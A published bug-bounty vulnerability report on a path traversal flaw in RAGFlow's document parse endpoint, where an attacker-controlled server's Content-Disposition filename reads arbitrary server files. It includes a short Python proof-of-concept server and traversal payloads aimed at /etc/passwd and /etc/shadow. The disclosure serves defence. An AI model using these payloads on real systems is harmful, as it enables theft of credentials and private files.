# Arbitrary File Read via Path Traversal in Content-Disposition Filename (document parse endpoint) ## meta platform: huntr program: RAGFlow asset: https://github.com/infiniflow/ragflow date: 2026-02-12 status: PUBLISHED published_date: 2026-02-15 ```` Repository URL: https://github.com/infiniflow/ragflow Package Manager: pip Version Affected: 0.24.0 Vulnerability Type: Path Traversal CVSS: - Attack Vector: Network - Attack Complexity: Low - Privileges Required: Low - User Interaction: None - Scope: Unchanged - Confidentiality: High - Integrity: None - Availability: None Title: Arbitrary file read via path traversal in Content-Disposition filename (document parse) Description: # Description The `POST /v1/document/parse` endpoint accepts a URL parameter, fetches it with headless Chrome, and extracts the filename from the HTTP `Content-Disposition` response header via regex at line 874: r = re.search(r"filename=\"([^\"]+)\"", str(res_headers)) This filename is passed directly into `os.path.join()` at line 878 without any sanitization: f = File(r.group(1), os.path.join(download_path, r.group(1))) An attacker-controlled server can return `Content-Disposition: attachment; filename="../../../../etc/passwd"`, causing the path to resolve outside the intended `logs/downloads` directory. The `File.read()` method then opens and reads the traversed path, and the contents are returned in the API response via `FileService.parse_docs()`. Python's `os.path.join()` also discards the base path entirely when given an absolute component, so `filename="/etc/shadow"` directly reads `/etc/shadow`. # Proof of Concept ## 1. Start attacker's malicious HTTP server (on a public IP): ```python from http.server import HTTPServer, BaseHTTPRequestHandler class Handler(BaseHTTPRequestHandler): def do_GET(self, *a, **kw): self.send_response(200) self.send_header("Content-Type", "application/octet-stream") self.send_header("Content-Disposition", 'attachment; filename="../../../../etc/passwd"') self.end_headers() self.wfile.write(b"placeholder") HTTPServer(("0.0.0.0", 8888), Handler).serve_forever() Impact: This vulnerability is capable of allowing any authenticated user to read arbitrary files on the RAGFlow server by controlling the Content-Disposition filename returned by an attacker-controlled HTTP server. The parsed file contents are returned in the API response, exposing configuration files, database credentials, private keys, and application source code. Occurrences: - Permalink: https://github.com/infiniflow/ragflow/blob/bc9ed24a8503a0a5013341b63c428169c27ff280/api/apps/document_app.py#L878 Description: `os.path.join(download_path, r.group(1))` uses the unsanitized filename from the Content-Disposition header. Path traversal sequences (e.g., `../../../../etc/passwd`) or absolute paths (e.g., `/etc/shadow`) escape the intended download directory. - Permalink: https://github.com/infiniflow/ragflow/blob/bc9ed24a8503a0a5013341b63c428169c27ff280/api/apps/document_app.py#L874 Description: Filename is extracted from Content-Disposition via regex with no sanitization — `re.search(r"filename=\"([^\"]+)\"", ...)` passes the raw value directly to `os.path.join()`. References: - https://cwe.mitre.org/data/definitions/22.html — CWE-22: Path Traversal - https://owasp.org/www-community/attacks/Path_Traversal — OWASP Path Traversal - https://docs.python.org/3/library/os.path.html#os.path.join — Python os.path.join behavior with absolute paths ````